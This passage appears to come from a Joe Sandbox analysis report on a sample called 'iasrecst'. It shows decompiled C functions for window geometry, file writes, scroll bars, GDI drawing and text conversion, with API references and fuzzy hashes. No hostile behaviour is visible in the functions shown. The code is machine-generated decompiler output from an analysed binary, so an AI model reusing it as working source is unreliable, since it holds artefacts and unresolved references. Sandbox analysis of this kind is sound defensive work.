							 *((intOrPtr*)(_t128 + 0x3c)) = _t106;
							 *(_t128 + 0x48) = _v44.left;
							 *((intOrPtr*)(_t128 + 0x4c)) = _v44.top;
						}
					} else {
						_v44.right =  *((intOrPtr*)(_t128 + 0x60)) -  *((intOrPtr*)(_t128 + 0x58)) + _v44.left + _v12;
						_v44.bottom =  *((intOrPtr*)(_t128 + 0x64)) -  *((intOrPtr*)(_t128 + 0x5c)) + _v44.top + _v8;
						_t120 = IntersectRect( &_v28,  &_v60,  &_v44);
						_t152 = _t120;
						if(_t120 != 0) {
							 *((intOrPtr*)(_t128 + 0x40)) =  *((intOrPtr*)(_t128 + 0x38)) + _v12;
							 *((intOrPtr*)(_t128 + 0x44)) =  *((intOrPtr*)(_t128 + 0x3c)) + _v8;
							 *((intOrPtr*)(_t128 + 0x50)) = _v44.right;
							 *((intOrPtr*)(_t128 + 0x54)) = _v44.bottom;
						}
					}
					 *((intOrPtr*)(_t128 + 4)) = _a4;
					 *((intOrPtr*)(_t128 + 8)) = _a8;
					return E0042007A(_t128, _t152, 0);
				}
				if(_t138 == 0xb) {
					__eflags = _t138 - 0xa;
					if(_t138 != 0xa) {
						_t14 = __ecx + 0x30;
						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t79;
						__eflags =  *_t14;
						goto L9;
					}
					goto L7;
				} else {
					_t143 = 0x22;
					if(_t138 != 0xc) {
						_t8 = __ecx + 0x34;
						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t132;
						__eflags =  *_t8;
					} else {
						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t132;
					}
					_t81 =  *((intOrPtr*)(_t128 + 0x34)) -  *((intOrPtr*)(_t128 + 0x2c));
					goto L10;
				}
			}

APIs

GetDesktopWindow.USER32 ref: 0041FD67
GetWindowRect.USER32 ref: 0041FD72
IntersectRect.USER32 ref: 0041FDBD
IntersectRect.USER32 ref: 0041FE11

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Rect$IntersectWindow$Desktop
String ID:
API String ID: 123605412-0
Opcode ID: 015e43c128581ee0b130330a2085ed8f419fa95b38046ca9c52191cf96206b73
Instruction ID: 7ef3134b71351d20188b2f6e6573302e8d5814b45845c27d755b710e50fb3d9e
Opcode Fuzzy Hash: 015e43c128581ee0b130330a2085ed8f419fa95b38046ca9c52191cf96206b73
Instruction Fuzzy Hash: 43517272A00209DFCF54DFA8D5C4ADEBBF5BF08314B1441A6E905EB20AE734E986CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF6B, Relevance: 6.1, APIs: 4, Instructions: 135
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040AF6B(long _a4, void* _a8, long _a12) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				void _v1048;
				void** _t66;
				signed int _t67;
				intOrPtr _t69;
				signed int _t70;
				intOrPtr _t71;
				signed int _t73;
				signed int _t80;
				int _t85;
				long _t87;
				intOrPtr* _t91;
				intOrPtr _t97;
				struct _OVERLAPPED* _t101;
				long _t103;
				signed int _t105;
				struct _OVERLAPPED* _t106;

				_t101 = 0;
				_v12 = 0;
				_v20 = 0;
				if(_a12 != 0) {
					_t91 = 0x43b520 + (_a4 >> 5) * 4;
					_t105 = (_a4 & 0x0000001f) + (_a4 & 0x0000001f) * 8 << 2;
					__eflags =  *( *_t91 + _t105 + 4) & 0x00000020;
					if(__eflags != 0) {
						E0040AE93(__eflags, _a4, 0, 2);
					}
					_t66 =  *_t91 + _t105;
					__eflags = _t66[1] & 0x00000080;
					if((_t66[1] & 0x00000080) == 0) {
						_t67 = WriteFile( *_t66, _a8, _a12,  &_v16, _t101);
						__eflags = _t67;
						if(_t67 == 0) {
							_a4 = GetLastError();
						} else {
							_a4 = _t101;
							_v12 = _v16;
						}
						L15:
						_t69 = _v12;
						__eflags = _t69 - _t101;
						if(_t69 != _t101) {
							_t70 = _t69 - _v20;
							__eflags = _t70;
							return _t70;
						}
						__eflags = _a4 - _t101;
						if(_a4 == _t101) {
							L25:
							_t71 =  *_t91;
							__eflags =  *(_t71 + _t105 + 4) & 0x00000040;
							if(( *(_t71 + _t105 + 4) & 0x00000040) == 0) {
								L27:
								 *((intOrPtr*)(E00406F78())) = 0x1c;
								_t73 = E00406F81();
								 *_t73 = _t101;
								L24:
								return _t73 | 0xffffffff;
							}
							__eflags =  *_a8 - 0x1a;
							if( *_a8 == 0x1a) {
								goto L1;
							}
							goto L27;
						}
						_t106 = 5;
						__eflags = _a4 - _t106;
						if(_a4 != _t106) {
							_t73 = E00406F05(_a4);
						} else {
							 *((intOrPtr*)(E00406F78())) = 9;
							_t73 = E00406F81();
							 *_t73 = _t106;
						}
						goto L24;
					}
					__eflags = _a12 - _t101;
					_v8 = _a8;
					_a4 = _t101;
					if(_a12 <= _t101) {
						goto L25;
					} else {
						goto L6;
					}
					do {
						L6:
						_t80 =  &_v1048;
						do {
							__eflags = _v8 - _a8 - _a12;
							if(_v8 - _a8 >= _a12) {
								break;
							}
							_v8 = _v8 + 1;
							_t97 =  *_v8;
							__eflags = _t97 - 0xa;
							if(_t97 == 0xa) {
								_v20 = _v20 + 1;
								 *_t80 = 0xd;
								_t80 = _t80 + 1;
								__eflags = _t80;
							}
							 *_t80 = _t97;
							_t80 = _t80 + 1;
							__eflags = _t80 -  &_v1048 - 0x400;
						} while (_t80 -  &_v1048 < 0x400);
						_t103 = _t80 -  &_v1048;
						_t85 = WriteFile( *( *_t91 + _t105),  &_v1048, _t103,  &_v16, 0);
						__eflags = _t85;
						if(_t85 == 0) {
							_a4 = GetLastError();
							break;
						}
						_t87 = _v16;
						_v12 = _v12 + _t87;
						__eflags = _t87 - _t103;
						if(_t87 < _t103) {
							break;
						}
						__eflags = _v8 - _a8 - _a12;
					} while (_v8 - _a8 < _a12);
					_t101 = 0;
					__eflags = 0;
					goto L15;
				}
				L1:
				return 0;
			}

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000001,?,?), ref: 0040B032

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: fd880a33552e59a877ac07e62e70fb8bcc1509261c86d9df016157276de9b604
Instruction ID: 01ac4f6acfc5913959f88f192ecd96d6d2ffcc37b6012a8bce105fbf1c838ef3
Opcode Fuzzy Hash: fd880a33552e59a877ac07e62e70fb8bcc1509261c86d9df016157276de9b604
Instruction Fuzzy Hash: 21519371A00209EFCB11DF68C844B9E7BB4EF41344F1581BAE825AB291D734DA51CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00427B02, Relevance: 6.1, APIs: 4, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00427B02(void* __ecx, int _a4, int _a8, int _a12) {
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t66;
				int _t68;
				void* _t69;
				intOrPtr _t75;
				intOrPtr* _t78;
				signed short _t94;
				intOrPtr* _t107;
				signed int _t110;
				int* _t111;
				intOrPtr _t113;
				void* _t114;

				_t114 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xec)) != 0) {
					_t89 = _a4;
					_t60 =  *((intOrPtr*)(__ecx + 0x90));
					 *(__ecx + 0xf8) = 1;
					_t110 = _a4 + _a4 * 4 << 3;
					 *((intOrPtr*)(_t60 + 0x20)) =  *((intOrPtr*)(_t60 + _t110 + 0x20));
					 *((intOrPtr*)(_t60 + 0x24)) =  *((intOrPtr*)(_t60 + _t110 + 0x24));
					_t61 =  *((intOrPtr*)(__ecx + 0x90));
					 *((intOrPtr*)(_t61 + 0x10)) =  *((intOrPtr*)(_t61 + _t110 + 0x10));
					 *((intOrPtr*)(_t61 + 0x14)) =  *((intOrPtr*)(_t61 + _t110 + 0x14));
					E00427C71(__ecx,  *((intOrPtr*)(__ecx + 0xf4)) + _t89, 0);
					E0042722C(__ecx,  *((intOrPtr*)(_t61 + _t110 + 0x14)), __eflags, 0);
					_t66 =  *((intOrPtr*)(_t114 + 0x90));
					_t111 = _t110 + _t66 + 0x18;
					_a8 = MulDiv(_a8,  *_t111,  *(_t110 + _t66 + 0x1c));
					_t68 = MulDiv(_a12,  *_t111, _t111[1]);
					_t107 =  *((intOrPtr*)(_t114 + 0x90));
					_a8 = _a8 +  *_t107;
					_t69 = _t68 +  *((intOrPtr*)(_t107 + 4));
					__eflags = _t69;
					_push(_t69);
					_push(_a8);
					return E0041B0C1(_t114,  *((intOrPtr*)(_t107 + 4)));
				}
				 *(__ecx + 0xf8) =  *(__ecx + 0xe8);
				ShowScrollBar( *(__ecx + 0x1c), 0, 0);
				_t75 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t114 + 0x114)))) + 0x5c));
				_t94 =  *((intOrPtr*)(_t75 + 0x1e));
				if(_t94 >= 0x8000) {
					L3:
					_a4 = 0;
					L4:
					ShowScrollBar( *(_t114 + 0x1c), 1, _a4);
					if(_a4 != 0) {
						_t78 =  *((intOrPtr*)(_t114 + 0x114));
						_v28 = 3;
						_t113 = 1;
						_v24 =  *( *((intOrPtr*)( *_t78 + 0x5c)) + 0x1c) & 0x0000ffff;
						_v20 =  *( *((intOrPtr*)( *_t78 + 0x5c)) + 0x1e) & 0x0000ffff;
						_v16 = _t113;
						if(E00415006(_t114, _t113,  &_v32, 0) == 0) {
							E00414F60(_t114, _t113, _v24, _v20, 0);
						}
					}
					return E00427C71(_t114,  *((intOrPtr*)(_t114 + 0xf4)), 1);
				}
				_a4 = 1;
				if((_t94 & 0x0000ffff) - ( *(_t75 + 0x1c) & 0x0000ffff) <= 0x7fff) {
					goto L4;
				}
				goto L3;
			}

APIs

ShowScrollBar.USER32(?,00000000,00000000), ref: 00427B32
ShowScrollBar.USER32(?,00000001,?), ref: 00427B6D
MulDiv.KERNEL32(?,?,?), ref: 00427C40
MulDiv.KERNEL32(?,?,?), ref: 00427C4D

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: ScrollShow
String ID:
API String ID: 3611344627-0
Opcode ID: 2acf91cb5d467283592410175f9d93aeb9e8677cf2499e65e3e46aab8ffa07e5
Instruction ID: e36dfcb719c56f5c0c47cfadceb7236ddc00b612851f65575ceccfe99fb50706
Opcode Fuzzy Hash: 2acf91cb5d467283592410175f9d93aeb9e8677cf2499e65e3e46aab8ffa07e5
Instruction Fuzzy Hash: A1417C70600615AFCB14DF29D880EAABBF5FF88308F10856EF9199B361D774E851DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0042007A, Relevance: 6.1, APIs: 4, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0042007A(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				void* __ebp;
				intOrPtr _t56;
				signed char _t60;
				signed char _t65;
				intOrPtr _t67;
				signed int _t73;
				void* _t76;
				intOrPtr _t84;
				intOrPtr _t95;

				_t56 = 1;
				_t76 = __ecx;
				_v24 = _t56;
				_v20 = _t56;
				_push(GetStockObject(0));
				_t84 = E0041A5FC();
				_v16 = _t84;
				_v8 = E00423BE7(__eflags);
				_t60 =  *(_t76 + 0x74);
				_v12 = _t84;
				if((0x0000a000 & _t60) == 0) {
					__eflags = _t60 & 0x00000050;
					if(__eflags == 0) {
						_v24 = GetSystemMetrics(0x20) - 1;
						_v20 = GetSystemMetrics(0x21) - 1;
						_t65 =  *(_t76 + 0x78);
						__eflags = 0x0000a000 & _t65;
						if((0x0000a000 & _t65) == 0) {
							L7:
							__eflags = _t65 & 0x00000050;
							if(__eflags == 0) {
								L10:
							} else {
								__eflags =  *(_t76 + 0x7c);
								if(__eflags == 0) {
									goto L10;
								} else {
									goto L9;
								}
							}
						} else {
							__eflags =  *(_t76 + 0x7c);
							if(__eflags != 0) {
								goto L7;
							}
						}
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v12 = _v8;
					} else {
						goto L2;
					}
				} else {
					L2:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(_a4 != 0) {
					_v20 = 0;
					_v24 = 0;
				}
				_t95 =  *0x439c3c; // 0x1
				if(_t95 != 0 && ( *(_t76 + 0x75) & 0x000000f0) != 0) {
					InflateRect( &_v40, 0xffffffff, 0xffffffff);
				}
				_t97 =  *(_t76 + 0x24);
				_t67 = _v8;
				if( *(_t76 + 0x24) == 0) {
					_t67 = _v16;
				}
				E00423C5A( *((intOrPtr*)(_t76 + 0x84)), _t97,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
				asm("movsd");
				_t73 = 0 | _v12 == _v8;
				 *(_t76 + 0x24) = _t73;
				return _t73;
			}

APIs

GetStockObject.GDI32(00000000), ref: 00420090

Part of subcall function 00423BE7: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,004200A6), ref: 00423C26
Part of subcall function 00423BE7: CreatePatternBrush.GDI32(00000000), ref: 00423C33
Part of subcall function 00423BE7: DeleteObject.GDI32(00000000), ref: 00423C3F

GetSystemMetrics.USER32 ref: 004200D6
GetSystemMetrics.USER32 ref: 004200DE
InflateRect.USER32(?,000000FF,000000FF), ref: 00420134

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: CreateMetricsObjectSystem$BitmapBrushDeleteInflatePatternRectStock
String ID:
API String ID: 419749085-0
Opcode ID: f04683a99d2cf70874936f412b73c80b9557d256e680e15b78c8faeb2f1dfe54
Instruction ID: e0589e39635e5819ef82d448fd258ad5fc30fad598c9d44a8e29054fd3acad8a
Opcode Fuzzy Hash: f04683a99d2cf70874936f412b73c80b9557d256e680e15b78c8faeb2f1dfe54
Instruction Fuzzy Hash: 1B413D71E006289BCF11CFA4D984BAEBBF5AF09310F514166ED10BB296D3B59E41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB45, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040EB45(short* _a4, char* _a8, intOrPtr _a12, char* _a16, intOrPtr* _a20) {
				intOrPtr* _t29;
				int _t30;
				void* _t32;
				signed int _t33;
				int _t35;
				signed short* _t38;
				short* _t39;
				intOrPtr _t41;
				intOrPtr _t42;
				int _t46;
				signed char _t50;
				char* _t53;
				char* _t54;

				_t53 = _a8;
				if(_t53 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					_t50 =  *_t53;
					if(_t50 != 0) {
						_t29 = _a20;
						if(_t29 != 0) {
							_t42 =  *_t29;
							_t30 =  *(_t29 + 4);
						} else {
							_t42 =  *0x439eec; // 0x0
							_t30 =  *0x439efc; // 0x0
						}
						if(_t42 != 0) {
							_t54 = _a16;
							if( *_t54 == 0) {
								_t41 =  *0x437100; // 0x43710a
								if(( *(_t41 + 1 + (_t50 & 0x000000ff) * 2) & 0x00000080) == 0) {
									if(MultiByteToWideChar(_t30, 9, _t53, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
										goto L13;
									}
									L21:
									_t33 = E00406F78();
									 *_t33 = 0x2a;
									return _t33 | 0xffffffff;
								}
								_t46 =  *0x43730c; // 0x1
								if(_a12 >= _t46) {
									if(_t46 <= 1 || MultiByteToWideChar(_t30, 9, _t53, _t46, _a4, 0 | _a4 != 0x00000000) == 0) {
										if(_t53[1] != 0) {
											goto L19;
										}
										 *_t54 =  *_t54 & 0x00000000;
										goto L21;
									} else {
										L19:
										_t35 =  *0x43730c; // 0x1
										return _t35;
									}
								}
								 *_t54 = _t50;
								_push(0xfffffffe);
								goto L14;
							}
							_t54[1] = _t50;
							if( *0x43730c <= 1 || MultiByteToWideChar(_t30, 9, _t54, 2, _a4, 0 | _a4 != 0x00000000) == 0) {
								 *_t54 = 0;
								goto L21;
							} else {
								 *_t54 = 0;
								goto L19;
							}
						} else {
							_t38 = _a4;
							if(_t38 != 0) {
								 *_t38 = _t50 & 0x000000ff;
							}
							L13:
							_push(1);
							L14:
							_pop(_t32);
							return _t32;
						}
					} else {
						_t39 = _a4;
						if(_t39 != 0) {
							 *_t39 = 0;
						}
						goto L5;
					}
				}
			}

APIs

MultiByteToWideChar.KERNEL32(00000006,00000009,?,00000002,00000000,00000000,751470F0,0043B508,00000000,?,0040EB26,00000000,00000002,?,?,?), ref: 0040EBC5
MultiByteToWideChar.KERNEL32(00000006,00000009,00000002,00000001,00000000,00000000,751470F0,0043B508,00000000,?,0040EB26,00000000,00000002,?,?,?), ref: 0040EC21
MultiByteToWideChar.KERNEL32(00000006,00000009,00000002,00000001,00000000,00000000,751470F0,0043B508,00000000,?,0040EB26,00000000,00000002,?,?,?), ref: 0040EC48

Strings

qC, xrefs: 0040EBEA

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: qC
API String ID: 626452242-723977305
Opcode ID: 9b978aa82f3ed8b50052fab243b56dbffd9d8b2fb8176b7af756b45fab2e9ea7
Instruction ID: c9bfa79667547676a2f9c640e0e00b1591e9fa3c2d1d8cd3a8b3004187d1f30f
Opcode Fuzzy Hash: 9b978aa82f3ed8b50052fab243b56dbffd9d8b2fb8176b7af756b45fab2e9ea7
Instruction Fuzzy Hash: FC31A070204206EFDB20CF22DCC4A6A3BB5AB41711F14893EE5439A2D1E378ECA1D759

Uniqueness

Uniqueness Score: -1.00%

Function 004040A0, Relevance: 6.1, APIs: 4, Instructions: 101
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004040A0(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, signed int _a32, intOrPtr _a36, signed int _a40) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _t83;
				signed int _t85;
				void* _t126;
				void* _t128;

				if(_a40 < 4) {
					_a40 = 4;
				}
				asm("cdq");
				_v8 = _a28 / _a40 + 1;
				asm("cdq");
				_v12 = _a32 / _a40 + 1;
				E004061D5(E00406204(0));
				_t128 = _t126 + 8;
				_v16 = _v8 * _v12;
				while(_v16 > 0) {
					_t83 = E004061E2();
					asm("cdq");
					_v20 = _t83 % _v8;
					_t85 = E004061E2();
					asm("cdq");
					_v24 = _t85 % _v12;
					BitBlt(_a16, _a20 + _v20 * _a40, _a24 + _v24 * _a40, _a40, _a40, _a4, _a8 + _v20 * _a40, _a12 + _v24 * _a40, 0xcc0020);
					asm("cdq");
					if(_v16 % 0xa == 0) {
						E0040381D(_a36);
						_t128 = _t128 + 4;
					}
					_v16 = _v16 - 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				return 1;
			}

APIs

_rand.LIBCMT ref: 004040F4
_rand.LIBCMT ref: 00404100
BitBlt.GDI32(?,?,?,?,?,?,00000000,?,00CC0020), ref: 00404155
BitBlt.GDI32(?,?,?,00CC0020,?,?,00000000,?,00CC0020), ref: 004041A9

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: _rand
String ID:
API String ID: 1172538735-0
Opcode ID: a2d48083adc6e386331021ddbb1d8997b7df1032238b4ade521697a42fa36f33
Instruction ID: ed2ed6788aa4e0fa1879982426311b249628acefad2a4dc112bdad2b7b6bc882
Opcode Fuzzy Hash: a2d48083adc6e386331021ddbb1d8997b7df1032238b4ade521697a42fa36f33
Instruction Fuzzy Hash: C83107B5A00109EFCB04DF99C985EEE77B9EF9C308F118269F919A7240D634EA10CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004293D9, Relevance: 6.1, APIs: 4, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004293D9(void* __ecx) {
				INT* _t43;
				CHAR* _t44;
				CHAR* _t47;
				CHAR* _t65;
				void* _t76;
				void* _t81;
				void* _t83;

				E00406520(E0042A890, _t81);
				_t43 =  *(_t81 + 0x20);
				_t65 = 0;
				 *((intOrPtr*)(_t81 - 0x10)) = _t83 - 0x20;
				_t76 = __ecx;
				 *(_t81 - 0x14) = 0;
				 *((intOrPtr*)(_t81 - 0x18)) = 0;
				if(_t43 != 0) {
					L4:
					_t44 = ExtTextOutA( *(_t76 + 4),  *(_t81 + 8),  *(_t81 + 0xc),  *(_t81 + 0x10),  *(_t81 + 0x14),  *(_t81 + 0x18),  *(_t81 + 0x1c), _t43);
					 *(_t81 + 0x18) = _t44;
					if( *((intOrPtr*)(_t81 - 0x18)) != 0 && _t44 != 0 && (GetTextAlign( *(_t76 + 8)) & 0x00000001) != 0) {
						GetCurrentPositionEx( *(_t76 + 4), _t81 - 0x20);
						E0041A1BF(_t76, _t81 - 0x28,  *(_t81 - 0x20) -  *((intOrPtr*)(_t81 - 0x18)),  *((intOrPtr*)(_t81 - 0x1c)));
					}
					E00413206( *(_t81 - 0x14));
					E00413206(_t65);
					_t47 =  *(_t81 + 0x18);
				} else {
					if( *(_t81 + 0x1c) != 0) {
						 *(_t81 - 4) = 0;
						 *(_t81 - 0x14) = E004131DD( *(_t81 + 0x1c) << 2);
						_t65 = E004131DD( *(_t81 + 0x1c));
						 *(_t81 - 4) =  *(_t81 - 4) | 0xffffffff;
						E0042914E(_t76, _t81 - 0x20, _t81 + 8,  *(_t81 + 0x18), _t81 + 0x1c, 0, 0, 0, 0, _t65,  *(_t81 - 0x14), _t81 - 0x18);
						_t43 =  *(_t81 - 0x14);
						 *(_t81 + 0x18) = _t65;
						goto L4;
					} else {
						_t47 = 1;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t81 - 0xc));
				return _t47;
			}

APIs

__EH_prolog.LIBCMT ref: 004293DE
ExtTextOutA.GDI32(?,?,?,?,?,?,?,?), ref: 0042946C
GetTextAlign.GDI32(?), ref: 00429481
GetCurrentPositionEx.GDI32(?,?), ref: 00429492

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Text$AlignCurrentH_prologPosition
String ID:
API String ID: 2331262098-0
Opcode ID: ba3f12c094f1310c0665f5f126d81fc9c6abdaded98a66113d688dd55281fba0
Instruction ID: d4a08c63824a92c840afe16e88adb87e11ee856b7d6374c0f69a009a87428bbd
Opcode Fuzzy Hash: ba3f12c094f1310c0665f5f126d81fc9c6abdaded98a66113d688dd55281fba0
Instruction Fuzzy Hash: 60311872A0411AAFCF219F95DC45CEF7F79FF08350F10411AF915A2250C7399A61DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181F2, Relevance: 6.1, APIs: 4, Instructions: 85
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181F2(void* __ecx, char _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				void* _t29;
				void* _t30;
				long _t33;
				long _t34;
				intOrPtr _t43;
				signed int _t45;
				signed int _t46;
				void* _t54;
				CHAR* _t55;
				intOrPtr* _t56;

				_t56 = _a4;
				_t54 = __ecx;
				E00406330(_t56, 0, 0x118);
				_t2 = _t56 + 0x12; // 0x4181ee
				lstrcpynA(_t2,  *(_t54 + 0xc), 0x104);
				_t29 =  *(_t54 + 4);
				_t46 = _t45 | 0xffffffff;
				if(_t29 == _t46) {
					L12:
					_t30 = 1;
					return _t30;
				}
				if(GetFileTime(_t29,  &_v12,  &_v20,  &_v28) == 0) {
					L3:
					return 0;
				}
				_t33 = GetFileSize( *(_t54 + 4), 0);
				 *(_t56 + 0xc) = _t33;
				if(_t33 != _t46) {
					_t55 =  *(_t54 + 0xc);
					if( *((intOrPtr*)(_t55 - 8)) != 0) {
						_t34 = GetFileAttributesA(_t55);
						if(_t34 == _t46) {
							goto L5;
						}
						 *(_t56 + 0x10) = _t34;
						L8:
						 *_t56 =  *((intOrPtr*)(E00410A21( &_a4,  &_v12, _t46)));
						 *((intOrPtr*)(_t56 + 8)) =  *((intOrPtr*)(E00410A21( &_a4,  &_v20, _t46)));
						_t43 =  *((intOrPtr*)(E00410A21( &_a4,  &_v28, _t46)));
						 *((intOrPtr*)(_t56 + 4)) = _t43;
						if( *_t56 == 0) {
							 *_t56 = _t43;
						}
						if( *((intOrPtr*)(_t56 + 8)) == 0) {
							_t24 = _t56 + 4; // 0xfffef685
							 *((intOrPtr*)(_t56 + 8)) =  *_t24;
						}
						goto L12;
					}
					L5:
					 *(_t56 + 0x10) =  *(_t56 + 0x10) & 0x00000000;
					goto L8;
				}
				goto L3;
			}

APIs

lstrcpynA.KERNEL32(004181EE,?,00000104,?,?,?,?,?,?,?,004181DC,?), ref: 0041821C
GetFileTime.KERNEL32(00000000,004181DC,?,?,?,?,?,?,?,?,?,004181DC,?), ref: 0041823D
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,004181DC,?), ref: 0041824C
GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,004181DC,?), ref: 0041826D

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

